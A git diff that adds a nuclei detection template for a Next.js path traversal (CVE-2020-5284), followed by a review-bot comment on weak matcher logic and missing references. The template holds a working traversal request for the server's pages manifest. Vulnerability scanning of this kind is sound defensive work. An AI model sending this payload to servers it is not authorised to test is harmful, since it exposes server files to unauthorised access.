diff --git a/cves/nextjs-cve-2020-5284.yaml b/cves/nextjs-cve-2020-5284.yaml
new file mode 100644
index 0000000000..72515cd7bc
--- /dev/null
+++ b/cves/nextjs-cve-2020-5284.yaml
@@ -0,0 +1,18 @@
+id: nextjs-cve-2020-5284
+
+info:
+ name: Next.js .next/ limited path traversal
+ author: Harsh & Rahul
+ severity: medium
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/_next/static/../server/pages-manifest.json"
+ matchers:
+ - type: regex
+ regex:
+ - '\{"/_app":".*?_app\.js"'
+ - type: status
+ status:
+ - 200
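Review bot: The request block lists a regex matcher and a status matcher but sets no `matchers-condition`, and nuclei combines matchers with OR by default. As written, any host that answers 200 for this path (a catch-all page or SPA fallback, for example) is reported as affected even when the body is not a pages manifest. Add `matchers-condition: and` alongside `matchers` so a finding requires both the 200 status and the manifest pattern in the body. The `info` block also has no `description` or `reference`, so whoever triages a hit has no pointer to the advisory or the fixed release; adding both would make the finding actionable.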